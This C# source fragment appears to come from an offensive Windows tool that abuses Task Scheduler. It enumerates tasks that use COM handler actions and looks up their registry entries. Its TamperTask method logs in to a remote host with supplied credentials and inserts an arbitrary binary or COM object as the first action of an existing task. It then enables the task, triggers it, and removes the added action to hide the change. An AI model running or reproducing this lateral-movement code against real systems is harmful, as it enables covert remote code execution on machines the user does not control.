private string GetCommandText(Action action)
{
ExecAction execAction = action as ExecAction;
ShowMessageAction showMessageAction = action as ShowMessageAction;
ComHandlerAction comHandlerAction = action as ComHandlerAction;
EmailAction emailAction = action as EmailAction;
if (execAction != null)
{
return($"{execAction.Path} {execAction.Arguments}");
}
else if (showMessageAction != null)
{
return($"Show message: '{showMessageAction.Title}'");
}
else if (comHandlerAction != null)
{
return($"COM handler: '{comHandlerAction.ClassName}'");
}
else if (emailAction != null)
{
return($"Send email: '{emailAction.Subject}'");
}
else
{
return("unknown action.");
}
}
static void FindTaskWithComAction(System.IO.TextWriter output, TaskFolder tf)
{
foreach (Task t in tf.Tasks)
{
foreach (Microsoft.Win32.TaskScheduler.Action ac in t.Definition.Actions)
{
ComHandlerAction a = ac as ComHandlerAction;
if (a == null)
{
continue;
}
string name = null, model = null, path = null, asm = null;
try
{
Microsoft.Win32.RegistryKey k = Microsoft.Win32.Registry.ClassesRoot.OpenSubKey("CLSID\\" + a.ClassId.ToString("B"));
if (k == null)
{
k = Microsoft.Win32.Registry.ClassesRoot.OpenSubKey("Wow6432Node\\CLSID\\" + a.ClassId.ToString("B"));
}
name = k.GetValue(null, "").ToString();
Microsoft.Win32.RegistryKey sk = k.OpenSubKey("InprocServer32");
path = sk.GetValue(null, "").ToString();
if (!string.IsNullOrEmpty(path))
{
try
{
System.Reflection.AssemblyName.GetAssemblyName(path);
asm = "Yes";
}
catch { asm = "No"; }
}
model = sk.GetValue("ThreadingModel", "").ToString();
}
catch { }
output.WriteLine("{0}\t{1}\t{2}\t{3}\t{4}\t{5}\t{6}\t{7}", t.Path, t.Name, a.ClassId, a.Data, name, path, model, asm);
}
}
foreach (var f in tf.SubFolders)
{
FindTaskWithComAction(output, f);
}
}
private static void TamperTask(string task, string binary, string arguments, bool run, string host, string username, string password, string domain)
{
TaskService ts = AuthenticateToRemoteHost(host, username, password, domain);
if (ts != null)
{
Task t = ts.GetTask(task);
if (t == null)
{
Console.WriteLine("[+] Task not found!");
return;
}
if (binary.Split('-').Length == 5) // weak parsing, I know but YOLO
{
// we suppose we want to execute a COM object and not a binary
ComHandlerAction action = new ComHandlerAction(new Guid(binary), string.Empty);
// add to the top of the list, otherwise it will not execute
Console.WriteLine("[+] Adding custom action to task.. ");
t.Definition.Actions.Insert(0, action);
// enable the task in case it's disabled
Console.WriteLine("[+] Enabling the task");
t.Definition.Settings.Enabled = true;
t.RegisterChanges();
GetTaskInfo(task, host, username, password, domain);
Console.WriteLine("\r\n");
// run it
if (run)
{
Console.WriteLine("[+] Triggering execution");
t.Run();
}
Console.WriteLine("[+] Cleaning up");
// remove the new action
t.Definition.Actions.Remove(action);
t.RegisterChanges();
}
else
{
ExecAction action = new ExecAction(binary, arguments, null);
// add to the top of the list, otherwise it will not execute
Console.WriteLine("[+] Adding custom action to task.. ");
t.Definition.Actions.Insert(0, action);
// enable the task in case it's disabled
Console.WriteLine("[+] Enabling the task");
t.Definition.Settings.Enabled = true;
t.RegisterChanges();
GetTaskInfo(task, host, username, password, domain);
Console.WriteLine("\r\n");
// run it
if (run)
{
Console.WriteLine("[+] Triggering execution");
t.Run();
}
Console.WriteLine("[+] Cleaning up");
// remove the new action
t.Definition.Actions.Remove(action);
t.RegisterChanges();
}
}
}
